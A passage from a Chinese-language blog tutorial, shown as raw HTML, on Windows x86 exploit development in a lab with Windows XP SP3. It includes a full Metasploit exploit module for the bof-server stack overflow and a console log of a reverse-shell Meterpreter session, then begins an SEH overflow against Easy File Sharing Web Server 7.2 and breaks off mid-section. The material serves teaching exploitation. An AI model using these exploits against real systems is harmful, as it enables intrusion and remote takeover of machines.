1270 lines
77 KiB
HTML
1270 lines
77 KiB
HTML
<!DOCTYPE html>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<html class="theme-next muse use-motion" lang="zh-Hans">
|
||
<head><meta name="generator" content="Hexo 3.8.0">
|
||
<meta charset="UTF-8">
|
||
<meta http-equiv="X-UA-Compatible" content="IE=edge">
|
||
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
|
||
<meta name="theme-color" content="#222">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<script src="/lib/pace/pace.min.js?v=1.0.2"></script>
|
||
<link href="/lib/pace/pace-theme-center-atom.min.css?v=1.0.2" rel="stylesheet">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<meta http-equiv="Cache-Control" content="no-transform">
|
||
<meta http-equiv="Cache-Control" content="no-siteapp">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">
|
||
|
||
<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">
|
||
|
||
|
||
<link rel="apple-touch-icon" sizes="180x180" href="/images/hackerrank.png?v=5.1.4">
|
||
|
||
|
||
<link rel="icon" type="image/png" sizes="32x32" href="/images/hackerrank.png?v=5.1.4">
|
||
|
||
|
||
<link rel="icon" type="image/png" sizes="16x16" href="/images/hackerrank.png?v=5.1.4">
|
||
|
||
|
||
<link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">
|
||
|
||
|
||
|
||
|
||
|
||
<meta name="keywords" content="二进制,Windows,漏洞,">
|
||
|
||
|
||
|
||
|
||
|
||
<link rel="alternate" href="/atom.xml" title="混元霹雳手" type="application/atom+xml">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<meta name="description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。">
|
||
<meta name="keywords" content="二进制,Windows,漏洞">
|
||
<meta property="og:type" content="article">
|
||
<meta property="og:title" content="x86-basic 漏洞利用">
|
||
<meta property="og:url" content="https://cool-y.github.io/2019/07/10/x86basic/index.html">
|
||
<meta property="og:site_name" content="混元霹雳手">
|
||
<meta property="og:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。">
|
||
<meta property="og:locale" content="zh-Hans">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/pwn/%E6%8D%95%E8%8E%B71.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/pwn/%E5%9B%BE%E7%89%871.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/pwn/%E5%9B%BE%E7%89%872.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/pwn/%E5%9B%BE%E7%89%873.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/pwn/%E5%9B%BE%E7%89%874.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/pwn/%E5%9B%BE%E7%89%875.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/pwn/%E5%9B%BE%E7%89%876.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/pwn/%E5%9B%BE%E7%89%877.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/pwn/%E5%9B%BE%E7%89%878.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/pwn/%E5%9B%BE%E7%89%879.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/pwn/%E5%9B%BE%E7%89%8710.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/pwn/%E5%9B%BE%E7%89%8711.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/pwn/231.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png">
|
||
<meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/pwn/%E6%8D%9511%E8%8E%B7.png">
|
||
<meta property="og:updated_time" content="2021-04-10T13:51:32.349Z">
|
||
<meta name="twitter:card" content="summary">
|
||
<meta name="twitter:title" content="x86-basic 漏洞利用">
|
||
<meta name="twitter:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。">
|
||
<meta name="twitter:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png">
|
||
|
||
|
||
|
||
<script type="text/javascript" id="hexo.configurations">
|
||
var NexT = window.NexT || {};
|
||
var CONFIG = {
|
||
root: '/',
|
||
scheme: 'Muse',
|
||
version: '5.1.4',
|
||
sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":true,"onmobile":true},
|
||
fancybox: true,
|
||
tabs: true,
|
||
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
|
||
duoshuo: {
|
||
userId: '0',
|
||
author: '博主'
|
||
},
|
||
algolia: {
|
||
applicationID: '',
|
||
apiKey: '',
|
||
indexName: '',
|
||
hits: {"per_page":10},
|
||
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
|
||
}
|
||
};
|
||
</script>
|
||
|
||
|
||
|
||
<link rel="canonical" href="https://cool-y.github.io/2019/07/10/x86basic/">
|
||
|
||
|
||
|
||
|
||
|
||
<title>x86-basic 漏洞利用 | 混元霹雳手</title>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
</head>
|
||
|
||
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<div class="container sidebar-position-left page-post-detail">
|
||
<div class="headband"></div>
|
||
|
||
<header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
|
||
<div class="header-inner"><div class="site-brand-wrapper">
|
||
<div class="site-meta ">
|
||
|
||
|
||
<div class="custom-logo-site-title">
|
||
<a href="/" class="brand" rel="start">
|
||
<span class="logo-line-before"><i></i></span>
|
||
<span class="site-title">混元霹雳手</span>
|
||
<span class="logo-line-after"><i></i></span>
|
||
</a>
|
||
</div>
|
||
|
||
<p class="site-subtitle">Battle⚔️ 2 the world🌎</p>
|
||
|
||
</div>
|
||
|
||
<div class="site-nav-toggle">
|
||
<button>
|
||
<span class="btn-bar"></span>
|
||
<span class="btn-bar"></span>
|
||
<span class="btn-bar"></span>
|
||
</button>
|
||
</div>
|
||
</div>
|
||
|
||
<nav class="site-nav">
|
||
|
||
|
||
|
||
<ul id="menu" class="menu">
|
||
|
||
|
||
<li class="menu-item menu-item-home">
|
||
<a href="/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-home"></i> <br>
|
||
|
||
首页
|
||
</a>
|
||
</li>
|
||
|
||
|
||
<li class="menu-item menu-item-about">
|
||
<a href="/about/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-user"></i> <br>
|
||
|
||
关于
|
||
</a>
|
||
</li>
|
||
|
||
|
||
<li class="menu-item menu-item-tags">
|
||
<a href="/tags/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
|
||
|
||
标签
|
||
</a>
|
||
</li>
|
||
|
||
|
||
<li class="menu-item menu-item-categories">
|
||
<a href="/categories/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-th"></i> <br>
|
||
|
||
分类
|
||
</a>
|
||
</li>
|
||
|
||
|
||
<li class="menu-item menu-item-archives">
|
||
<a href="/archives/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
|
||
|
||
归档
|
||
</a>
|
||
</li>
|
||
|
||
|
||
<li class="menu-item menu-item-bookmarks">
|
||
<a href="/bookmarks/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-map"></i> <br>
|
||
|
||
书签
|
||
</a>
|
||
</li>
|
||
|
||
|
||
<li class="menu-item menu-item-album">
|
||
<a href="/album/" rel="section">
|
||
|
||
<i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br>
|
||
|
||
相簿
|
||
</a>
|
||
</li>
|
||
|
||
|
||
|
||
</ul>
|
||
|
||
|
||
|
||
</nav>
|
||
|
||
|
||
|
||
</div>
|
||
</header>
|
||
|
||
<main id="main" class="main">
|
||
<div class="main-inner">
|
||
<div class="content-wrap">
|
||
<div id="content" class="content">
|
||
|
||
|
||
<div id="posts" class="posts-expand">
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
|
||
|
||
|
||
|
||
<div class="post-block">
|
||
<link itemprop="mainEntityOfPage" href="https://cool-y.github.io/2019/07/10/x86basic/">
|
||
|
||
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
|
||
<meta itemprop="name" content="Cool-Y">
|
||
<meta itemprop="description" content>
|
||
<meta itemprop="image" content="/images/avatar.png">
|
||
</span>
|
||
|
||
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
|
||
<meta itemprop="name" content="混元霹雳手">
|
||
</span>
|
||
|
||
|
||
<header class="post-header">
|
||
|
||
|
||
|
||
<h1 class="post-title" itemprop="name headline">x86-basic 漏洞利用</h1>
|
||
|
||
|
||
<div class="post-meta">
|
||
<span class="post-time">
|
||
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-calendar-o"></i>
|
||
</span>
|
||
|
||
<span class="post-meta-item-text">发表于</span>
|
||
|
||
<time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-10T17:00:36+08:00">
|
||
2019-07-10
|
||
</time>
|
||
|
||
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
<span class="post-category">
|
||
|
||
<span class="post-meta-divider">|</span>
|
||
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-folder-o"></i>
|
||
</span>
|
||
|
||
<span class="post-meta-item-text">分类于</span>
|
||
|
||
|
||
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
|
||
<a href="/categories/Pwn/" itemprop="url" rel="index">
|
||
<span itemprop="name">Pwn</span>
|
||
</a>
|
||
</span>
|
||
|
||
|
||
|
||
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
<span id="/2019/07/10/x86basic/" class="leancloud_visitors" data-flag-title="x86-basic 漏洞利用">
|
||
<span class="post-meta-divider">|</span>
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-eye"></i>
|
||
</span>
|
||
|
||
<span class="post-meta-item-text">阅读次数:</span>
|
||
|
||
<span class="leancloud-visitors-count"></span>
|
||
</span>
|
||
|
||
|
||
|
||
|
||
|
||
<div class="post-wordcount">
|
||
|
||
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-file-word-o"></i>
|
||
</span>
|
||
|
||
<span title="字数统计">
|
||
2.2k 字
|
||
</span>
|
||
|
||
|
||
|
||
<span class="post-meta-divider">|</span>
|
||
|
||
|
||
|
||
<span class="post-meta-item-icon">
|
||
<i class="fa fa-clock-o"></i>
|
||
</span>
|
||
|
||
<span title="阅读时长">
|
||
11 分钟
|
||
</span>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
<div class="post-description">
|
||
这部分是对Window x86平台下的几个典型漏洞利用方式的介绍,从最基础的、没有开启任何保护的漏洞程序入手,然后开启GS,最后通过rop绕过DEP。
|
||
</div>
|
||
|
||
|
||
</div>
|
||
</header>
|
||
|
||
|
||
|
||
|
||
|
||
<div class="post-body" itemprop="articleBody">
|
||
|
||
|
||
|
||
|
||
|
||
<h1 id="0x00-漏洞利用开发简介"><a href="#0x00-漏洞利用开发简介" class="headerlink" title="0x00 漏洞利用开发简介"></a>0x00 漏洞利用开发简介</h1><p>(1)需要什么</p>
|
||
<ul>
|
||
<li>Immunity Debugger -<a href="http://debugger.immunityinc.com/ID_register.py" target="_blank" rel="noopener">Download</a></li>
|
||
<li>Mona.py -<a href="https://github.com/corelan/mona" target="_blank" rel="noopener">Download</a></li>
|
||
<li>Metasploit框架-<a href="https://www.metasploit.com/" target="_blank" rel="noopener">下载</a></li>
|
||
<li>靶机–Windows XP sp3</li>
|
||
</ul>
|
||
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png" alt></p>
|
||
<ul>
|
||
<li>函数调用与栈:调用、返回</li>
|
||
<li>寄存器与函数栈帧:ESP、EBP</li>
|
||
<li>函数栈帧:局部变量、栈帧状态值、函数返回地址</li>
|
||
<li>函数调用约定与相关指令:参数传递方式、参数入栈顺序、恢复堆栈平衡的操作</li>
|
||
</ul>
|
||
<p>(2)函数调用的汇编过程</p>
|
||
<ol>
|
||
<li><p>示例程序</p>
|
||
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">charname[] = <span class="string">"1234567"</span>;</span><br><span class="line">voidfunc(<span class="keyword">int</span> a, <span class="keyword">int</span> b, <span class="keyword">int</span> c)</span><br><span class="line">{</span><br><span class="line"> charbuf[<span class="number">8</span>];</span><br><span class="line"> <span class="built_in">strcpy</span>(buf, name);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
|
||
</li>
|
||
<li><p>汇编过程</p>
|
||
</li>
|
||
</ol>
|
||
<ul>
|
||
<li>PUSH c, PUSH b, PUSH a</li>
|
||
<li>CALL address of func【保存返回地址;跳转】</li>
|
||
<li>MOV ebp, esp</li>
|
||
<li>PUSH ebp</li>
|
||
<li>SUB esp, 0x40</li>
|
||
<li>创建局部变量,4个字节为一组</li>
|
||
<li>do something</li>
|
||
<li>add esp, 0x40</li>
|
||
<li>pop ebp</li>
|
||
<li>RETN【弹出返回地址,跳转】</li>
|
||
</ul>
|
||
<ol start="3">
|
||
<li>栈帧结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/pwn/%E6%8D%95%E8%8E%B71.png" alt></li>
|
||
</ol>
|
||
<h1 id="0x01-简单栈溢出"><a href="#0x01-简单栈溢出" class="headerlink" title="0x01 简单栈溢出"></a>0x01 简单栈溢出</h1><blockquote>
|
||
<p><strong>目标程序:</strong><br><a href="http://redstack.net/blog/static/uploads/2008/01/bof-server.c" target="_blank" rel="noopener">bof-server source code</a><br><a href="http://redstack.net/blog/wp-content/uploads/2008/01/bof-server.exe" target="_blank" rel="noopener">bof-server binary for Windows</a><br><strong>usage:</strong><br>服务端<br><code>bof-server.exe 4242</code><br>客户端<br><code>telnet localhost 4242</code><br><code>version</code><br><code>bof-server v0.01</code><br><code>quit</code></p>
|
||
</blockquote>
|
||
<h2 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/pwn/%E5%9B%BE%E7%89%871.png" alt></p>
|
||
<p><strong>产生崩溃</strong><br>将输出的1024个A发送给靶机程序<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c "print('A' * 1024)"</span><br><span class="line">telnet 192.168.64.138 4242</span><br></pre></td></tr></table></figure></p>
|
||
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/pwn/%E5%9B%BE%E7%89%872.png" alt></p>
|
||
<h2 id="关闭防御措施"><a href="#关闭防御措施" class="headerlink" title="关闭防御措施"></a>关闭防御措施</h2><p>使用<strong>PESecurity</strong>检查可执行文件本身的防御措施开启情况<br>注意设置:Set-ExecutionPolicyUnrestricted</p>
|
||
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/pwn/%E5%9B%BE%E7%89%873.png" alt></p>
|
||
<p><strong>ASLR和DEP</strong><br>ASLR在xp下不用考虑,DEP可通过修改boot.ini中的nonexecute来完成(AlwaysOff、OptOut)<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/pwn/%E5%9B%BE%E7%89%874.png" alt></p>
|
||
<h2 id="整体的攻击流程"><a href="#整体的攻击流程" class="headerlink" title="整体的攻击流程"></a>整体的攻击流程</h2><ol>
|
||
<li>任意非00的指令覆盖buffer和EBP</li>
|
||
<li>从程序已经加载的dll中获取他们的jmp esp指令地址。</li>
|
||
<li>使用jmp esp的指令地址覆盖ReturnAddress</li>
|
||
<li>从下一行开始填充Shellcode<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/pwn/%E5%9B%BE%E7%89%875.png" alt></li>
|
||
</ol>
|
||
<h2 id="确定溢出点的位置"><a href="#确定溢出点的位置" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol>
|
||
<li><p>生成字符序列 <strong>pattern_create.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/pwn/%E5%9B%BE%E7%89%876.png" alt></p>
|
||
</li>
|
||
<li><p>发送给目标程序<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/pwn/%E5%9B%BE%E7%89%877.png" alt></p>
|
||
</li>
|
||
<li><p>计算偏移量 <strong>pattern_offset.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/pwn/%E5%9B%BE%E7%89%878.png" alt></p>
|
||
</li>
|
||
<li><p>确定payload结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/pwn/%E5%9B%BE%E7%89%879.png" alt></p>
|
||
</li>
|
||
</ol>
|
||
<h2 id="寻找jmp-esp跳板"><a href="#寻找jmp-esp跳板" class="headerlink" title="寻找jmp esp跳板"></a>寻找jmp esp跳板</h2><ol>
|
||
<li>OD附加进程看一下服务器加载了哪些模块<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/pwn/%E5%9B%BE%E7%89%8710.png" alt></li>
|
||
<li>查找JMP ESP指令的地址<br>在这里选择了ws2_32.dll作为对象,通过Metasploit的msfbinscan进行搜索<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/pwn/%E5%9B%BE%E7%89%8711.png" alt></li>
|
||
</ol>
|
||
<h2 id="自动化攻击"><a href="#自动化攻击" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> < Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = {})</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> => <span class="string">'Stack Based Buffer Overflow Example'</span>,</span><br><span class="line"> <span class="string">'Description'</span> => <span class="string">%q{</span></span><br><span class="line"><span class="string"> Stack Based Overflow Example Application Exploitation Module</span></span><br><span class="line"><span class="string"> }</span>,</span><br><span class="line"> <span class="string">'Platform'</span> => <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Author'</span> => <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line"> <span class="string">'Payload'</span> =></span><br><span class="line"> {</span><br><span class="line"> <span class="string">'space'</span> => <span class="number">400</span>,</span><br><span class="line"> <span class="string">'BadChars'</span> => <span class="string">"\x00\xff"</span></span><br><span class="line"> },</span><br><span class="line"> <span class="string">'Targets'</span> =></span><br><span class="line"> [</span><br><span class="line"> [</span><br><span class="line"> <span class="string">'Windows XP SP3'</span>,</span><br><span class="line"> {<span class="string">'Ret'</span> => <span class="number">0x71a22b53</span>, <span class="string">'Offset'</span> => <span class="number">520</span>}</span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"> <span class="string">'DisclosureDate'</span> => <span class="string">'2019-05-25'</span></span><br><span class="line"> ))</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line"> connect</span><br><span class="line"> buf = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line"> buf = buf + [target[<span class="string">'Ret'</span>]].pack(<span class="string">'V'</span>) + make_nops(<span class="number">20</span>) + payload.encoded</span><br><span class="line"> sock.put(buf)</span><br><span class="line"> handler</span><br><span class="line"> disconnect</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
|
||
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">msf5 > use exploit/windows/yanhan/bof_attack</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) > set rhosts 192.168.31.114</span><br><span class="line">rhosts => 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) > set rport 1000</span><br><span class="line">rport => 1000</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) > exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:4444 -> 192.168.31.114:1062) at 2019-07-10 16:38:51 +0800</span><br><span class="line"></span><br><span class="line">meterpreter > ls</span><br><span class="line">Listing: C:\Documents and Settings\Administrator</span><br><span class="line">================================================</span><br><span class="line"></span><br><span class="line">Mode Size Type Last modified Name</span><br><span class="line">---- ---- ---- ------------- ----</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Application Data</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Cookies</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Favorites</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Local Settings</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 My Documents</span><br><span class="line">100666/rw-rw-rw- 1048576 fil 2019-05-14 09:54:43 +0800 NTUSER.DAT</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 NetHood</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 PrintHood</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Recent</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 SendTo</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Templates</span><br><span class="line">100777/rwxrwxrwx 26665 fil 2019-05-28 14:59:10 +0800 bof-server.exe</span><br><span class="line">100666/rw-rw-rw- 1024 fil 2019-05-14 09:54:43 +0800 ntuser.dat.LOG</span><br><span class="line">100666/rw-rw-rw- 178 fil 2019-05-14 09:54:43 +0800 ntuser.ini</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-29 10:49:26 +0800 vulnserver</span><br><span class="line">40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 「开始」菜单</span><br><span class="line">40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 桌面</span><br><span class="line"></span><br><span class="line">meterpreter ></span><br></pre></td></tr></table></figure>
|
||
<hr>
|
||
<h1 id="0x02-基于SEH的栈溢出"><a href="#0x02-基于SEH的栈溢出" class="headerlink" title="0x02 基于SEH的栈溢出"></a>0x02 基于SEH的栈溢出</h1><blockquote>
|
||
<p><strong>目标程序</strong> Easy File Sharing Web Server 7.2</p>
|
||
<p><strong>漏洞点</strong><br>在处理请求时存在漏洞——一个恶意的请求头部(HEAD或GET)就可以引起缓冲区溢出,从而改写SEH链的地址。</p>
|
||
<p><strong>利用seh</strong><br>填充物+nseh+ seh(pop popretn指令序列地址)+shellcode</p>
|
||
<p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png" alt></p>
|
||
</blockquote>
|
||
<h2 id="确定溢出点的位置-1"><a href="#确定溢出点的位置-1" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol>
|
||
<li>生成字符序列<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 10000 > a.txt</span><br><span class="line">python -c "print(' HTTP/1.0\r\n\r\n')" > b.txt</span><br><span class="line">cat a.txt b.txt > c.txt</span><br></pre></td></tr></table></figure>
|
||
</li>
|
||
</ol>
|
||
<p>删除cat造成的多余字符0x0a<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vim -bz.txt</span><br><span class="line"># In Vim</span><br><span class="line">:%!xxd</span><br><span class="line"># After editing, use the instruction below to save</span><br><span class="line">:%!xxd -r</span><br></pre></td></tr></table></figure></p>
|
||
<ol start="2">
|
||
<li>构造SEH链</li>
|
||
</ol>
|
||
<ul>
|
||
<li>将Easy File Sharing Web Server 7.2加载到ImmunityDebugger中,并处于运行状态。</li>
|
||
<li>发送溢出字符序列</li>
|
||
<li>查看Easy File Sharing Web Server 7.2溢出地址<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/pwn/231.png" alt></li>
|
||
</ul>
|
||
<ol start="3">
|
||
<li>计算偏移量<br>计算catch块偏移量&计算下一条SEH记录偏移量</li>
|
||
</ol>
|
||
<h2 id="寻找PPR"><a href="#寻找PPR" class="headerlink" title="寻找PPR"></a>寻找PPR</h2><ol>
|
||
<li>使用mona寻找<br>需要POP/POP/RET指令的地址来载入下一条SEH记录的地址,并跳转到攻击载荷<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">!mona modules</span><br><span class="line">!mona seh</span><br></pre></td></tr></table></figure>
|
||
</li>
|
||
</ol>
|
||
<h2 id="自动化攻击-1"><a href="#自动化攻击-1" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><ol>
|
||
<li><p>编写攻击脚本</p>
|
||
